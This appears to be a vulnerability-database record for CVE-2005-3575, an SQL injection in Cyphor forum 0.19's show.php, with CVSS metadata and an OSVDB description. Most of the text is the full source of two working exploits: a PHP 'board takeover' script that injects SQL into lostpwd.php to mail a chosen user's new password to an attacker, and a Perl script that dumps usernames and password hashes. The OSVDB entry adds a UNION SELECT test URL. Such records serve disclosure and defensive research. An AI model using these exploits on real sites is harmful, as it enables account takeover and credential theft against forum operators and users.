ID CVE-2005-3575
Type cve
Reporter cve@mitre.org
Modified 2011-03-08T02:26:00
Description
SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
{"id": "CVE-2005-3575", "bulletinFamily": "NVD", "title": "CVE-2005-3575", "description": "SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2005-11-16T07:42:00", "modified": "2011-03-08T02:26:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3575", "reporter": "cve@mitre.org", "references": ["http://www.securiteam.com/unixfocus/6P00F1FEKC.html", "http://www.vupen.com/english/advisories/2005/2420", "http://www.securityfocus.com/bid/15418", "http://securityreason.com/securityalert/180", "http://www.osvdb.org/20983", "http://www.securityfocus.com/archive/1/416562"], "cvelist": ["CVE-2005-3575"], "type": "cve", "lastseen": "2021-02-02T05:24:39", "edition": 6, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:20983"]}, {"type": "exploitdb", "idList": ["EDB-ID:1321", "EDB-ID:1241"]}], "modified": "2021-02-02T05:24:39", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-02-02T05:24:39", "rev": 2}, "vulnersScore": 7.4}, "cpe": ["cpe:/a:cynox:cyphor:0.19"], "affectedSoftware": [{"cpeName": "cynox:cyphor", "name": "cynox cyphor", "operator": "le", "version": "0.19"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:cynox:cyphor:0.19:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cynox:cyphor:0.19:*:*:*:*:*:*:*", "versionEndIncluding": "0.19", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "180", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/180"}, {"name": "ADV-2005-2420", "refsource": "VUPEN", "tags": [], "url": "http://www.vupen.com/english/advisories/2005/2420"}, {"name": "20983", "refsource": "OSVDB", "tags": [], "url": "http://www.osvdb.org/20983"}, {"name": "15418", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/15418"}, {"name": "http://www.securiteam.com/unixfocus/6P00F1FEKC.html", "refsource": "MISC", "tags": [], "url": "http://www.securiteam.com/unixfocus/6P00F1FEKC.html"}, {"name": "20051113 Cyphor (Release: 0.19) Sql injection", "refsource": "BUGTRAQ", "tags": ["Exploit"], "url": "http://www.securityfocus.com/archive/1/416562"}]}
{"osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3575"], "edition": 1, "description": "## Vulnerability Description\nCyphor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the show.php script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nCyphor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the show.php script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,password,null,null,null%20from%20users%20where%20id=1\n## References:\nVendor URL: http://www.cynox.ch/cyphor/about.php\nOther Advisory URL: http://www.securiteam.com/unixfocus/6P00F1FEKC.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0175.html\nFrSIRT Advisory: ADV-2005-2420\n[CVE-2005-3575](https://vulners.com/cve/CVE-2005-3575)\nBugtraq ID: 15418\n", "modified": "2005-11-13T11:41:53", "published": "2005-11-13T11:41:53", "href": "https://vulners.com/osvdb/OSVDB:20983", "id": "OSVDB:20983", "title": "Cyphor show.php id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:50:30", "description": "Cyphor <= 0.19 (board takeover) SQL Injection Exploit. CVE-2005-3575. Webapps exploit for php platform", "published": "2005-10-08T00:00:00", "type": "exploitdb", "title": "Cyphor <= 0.19 board takeover SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3575"], "modified": "2005-10-08T00:00:00", "id": "EDB-ID:1241", "href": "https://www.exploit-db.com/exploits/1241/", "sourceData": "<?php\n# quoted from rgod \"1)if magic quotes off -> SQL Injection:\" /str0ke\n#\n# --- cyphor019_xpl.php 7.36 08/10/2005 #\n# #\n# Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover #\n# #\n# by rgod #\n# site: http://rgod.altervista.org #\n# #\n# make these changes in php.ini if you have troubles #\n# to launch this script: #\n# allow_call_time_pass_reference = on #\n# register_globals = on #\n# #\n# usage: launch this script from Apache, fill requested fields, then #\n# send yourself any user / admin password right now! #\n# #\n# Sun Tzu: \"There are five ways of attacking with fire. The first is to burn #\n# soldiers in their camp; the second is to burn stores; the third is to burn #\n# baggage trains; the fourth is to burn arsenals and magazines; the fifth is #\n# to hurl dropping fire amongst the opponent.\" #\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\", 2);\nob_implicit_flush (1);\n\necho'<html><head><title>Cyphor 0.19 SQL Injection/board takeover </title><meta\nhttp-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\"> <style\ntype=\"text/css\"> body {\tbackground-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;\nSCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\n{background-color: #FFFFFF !important} input {background-color: #303030\n!important} option { background-color: #303030 !important} textarea\n{background-color: #303030 !important} input {color: #1CB081 !important} option\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\n{background-color: #303030 !important} select {font-weight: normal; color:\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\n{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;\ncolor : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\nCyphor 0.19 (possibly prior versions) SQL injection / board takeover </p><p\nclass=\"Stile6\"> a script by rgod at <a href=\"http://rgod.altervista.org\"\ntarget=\"_blank\"> http://rgod.altervista.org</a></p> <table width=\"84%\"><tr> <td\nwidth=\"43%\"><form name=\"form1\" method=\"post\" action=\"'.$SERVER[PHP_SELF].'?path=\nvalue&host=value&port=value&username=value&proxy=value&your_email=value\"> <p>\n<input type=\"text\" name=\"host\"><span class=\"Stile5\"> hostname (ex: www.sitename.\ncom)</span></p><p><input type=\"text\" name=\"path\"><span class=\"Stile5\"> path (ex:\n/cyphor/ or /forum/ or just /)</span></p><p><input type=\"text\" name=\"port\"><span\nclass=\"Stile5\"> specify a port other than 80 (default value)</span></p><p><input\ntype=\"text\" name=\"username\"><span class=\"Stile5\">user whom you want the password\n,admin? ;) </span> </p> <p> <input type=\"text\" name=\"your_email\"><span\nclass=\"Stile5\"> email where the password will be sent</span> </p> <p> <input\ntype=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exploit through an HTTP prox\ny (ip:port) </span></p><p><input type=\"submit\" name=\"Submit\" value=\"go!\"></p>\n</form></td></tr></table></body></html>';\n\nfunction show($headeri)\n{\n$ii=0;\n$ji=0;\n$ki=0;\n$ci=0;\necho '<table border=\"0\"><tr>';\nwhile ($ii <= strlen($headeri)-1)\n{\n$datai=dechex(ord($headeri[$ii]));\nif ($ji==16) {\n $ji=0;\n $ci++;\n echo \"<td> </td>\";\n for ($li=0; $li<=15; $li++)\n { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\t\t\t }\n $ki=$ki+16;\n echo \"</tr><tr>\";\n }\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n{echo \"<td>\".$datai.\"</td> \";}\n$ii++;\n$ji++;\n}\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n { echo \"<td>  </td>\";\n }\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n { echo \"<td>\".$headeri[$li].\"</td>\";\n\t\t\t }\necho \"</tr></table>\";\n}\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\nfunction sendpacket($packet)\n{\nglobal $proxy, $host, $port, $html;\nif ($proxy=='')\n {$ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) { echo 'No response from '.htmlentities($host).'...';\n\t\t\tdie;\n\t\t }}\n\n else\n {\n\t if (!eregi($proxy_regex,$proxy))\n\t {echo htmlentities($proxy).' -> not a valid proxy...';\n\t die;\n\t }\n\t $parts=explode(':',$proxy);\n\t echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\t $ock=fsockopen($parts[0],$parts[1]);\n\t if (!$ock) { echo 'No response from proxy...';\n\t\t\tdie;\n\t\t }\n\t }\nfputs($ock,$packet);\nif ($proxy=='')\n {\n\n $html='';\n while (!feof($ock))\n {\n $html.=fgets($ock);\n }\n }\nelse\n {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\n {\n $html.=fread($ock,1);\n }\n }\nfclose($ock);\necho nl2br(htmlentities($html));\n}\n\ndefine('EMAIL_PREG', '#^[a-z0-9&\\-_.\\+]+?@[\\w\\-]+\\.([\\w\\-\\.]+\\.)?[\\w]+$#');\ndefine('USER_PREG', '#^[A-Za-z0-9_\\-]+$#');\n\nif (($path<>'') and ($host<>'') and ($your_email<>'') and ($username<>''))\n{\nif (!preg_match(EMAIL_PREG, $your_email)) {echo '<br>Need a valid email...'; die;}\nif (!preg_match(USER_PREG, $username)) {echo '<br>Need a valid username...'; die;}\n if ($port=='') {$port=80;}\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\n#STEP 1 -> retrieve the table prefix...\n$packet=\"GET \".$p.\"show.php?fid=' HTTP/1.0 \\r\\n\";\n$packet.=\"User-Agent: GetRight/4.5xx\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nshow($packet);\nsendpacket($packet);\n\n$temp=explode(\"SELECT * FROM \",$html);\n$temp2=explode(\"forums WHERE\",$temp[1]);\n$table_prefix=trim($temp2[0]);\n\necho '<br> Table prefix ->'.htmlentities($table_prefix);\nif ($table_prefix=='') {echo 'Exploit failed...'; die;}\n\n#STEP 2 -> send yourself a new password...\n$sql=\"') UNION SELECT * FROM \".$table_prefix.\"users WHERE nick='\".$username.\"'/*\";\n$sql=urlencode($sql);\n$data=\"email=\".urlencode($your_email).\"&nick=\".$sql.\"&submit=Submit\";\n$packet=\"POST \".$p.\"lostpwd.php HTTP/1.1\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"lostpwd.php\\r\\n\";\n$packet.=\"Accept-Language: it\\r\\n\";\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n$packet.=\"User-Agent: Internet Ninja x.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n$packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\n$packet.=$data;\nshow($packet);\nsendpacket($packet);\nif (eregi(\"New password sent.\",$html)) {echo '<br>Exploit successful...check your email box...';}\n\t\t\t\telse {echo '<br>Exploit failed...';}\n}\nelse\n{ echo 'Fill in requested fields, optionally specify a proxy...'; }\n?>\n\n# milw0rm.com [2005-10-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1241/"}, {"lastseen": "2016-01-31T13:59:49", "description": "Cyphor 0.19 (show.php id) Remote SQL Injection Exploit. CVE-2005-3575. Webapps exploit for php platform", "published": "2005-11-14T00:00:00", "type": "exploitdb", "title": "Cyphor 0.19 show.php id Remote SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3575"], "modified": "2005-11-14T00:00:00", "id": "EDB-ID:1321", "href": "https://www.exploit-db.com/exploits/1321/", "sourceData": "#!/bin/env perl\n#//-----------------------------------------------------------#\n#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL\n#// Greets For Devil-00 - Abducter - Almaster\n#// http://WwW.SoQoR.NeT\n#//-----------------------------------------------------------#\n\nuse LWP::Simple;\n\nprint \"\\n#####################################################\";\nprint \"\\n# Cyphor Forum Exploit By : HACKERS PAL #\";\nprint \"\\n# Http://WwW.SoQoR.NeT #\";\nif(!$ARGV[0]||!$ARGV[1]) {\nprint \"\\n# -- Usage: #\";\nprint \"\\n# -- perl $0 [Full-Path] 1 #\";\nprint \"\\n# -- Example: #\";\nprint \"\\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#\";\nprint \"\\n# Greets To Devil-00 - Abducter - almastar #\";\nprint \"\\n#####################################################\\n\";\n exit(0);\n} else {\nprint \"\\n# Greets To Devil-00 - Abducter - almastar #\";\nprint \"\\n#####################################################\\n\";\n\n $web=$ARGV[0];\n $id=$ARGV[1];\n\n$url = \"show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id\";\n$site=\"$web/$url\";\n$page = get($site) || die \"[-] Unable to retrieve: $!\";\nprint \"\\n[+] Connected to: $ARGV[0]\\n\";\n\nprint \"[+] User ID is : $id \";\n$page =~ m/<span class=bigh>(.*?)<\\/span>/ && print \"\\n[+] User Name is: $1\\n\";\nprint \"\\n[-] Unable to retrieve User Name\\n\" if(!$1);\n$page =~ m/<span class=message>(.*?)<\\/span>/ && print \"[+] Hash of password is: $1\\n\";\nprint \"[-] Unable to retrieve hash of password\\n\" if(!$1);\n\n}\n\nprint \"\\n\\nGreets From HACKERS PAL To you :)\\nWwW.SoQoR.NeT . . . You Are Welcome\\n\\n\";\n\n# milw0rm.com [2005-11-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1321/"}]}
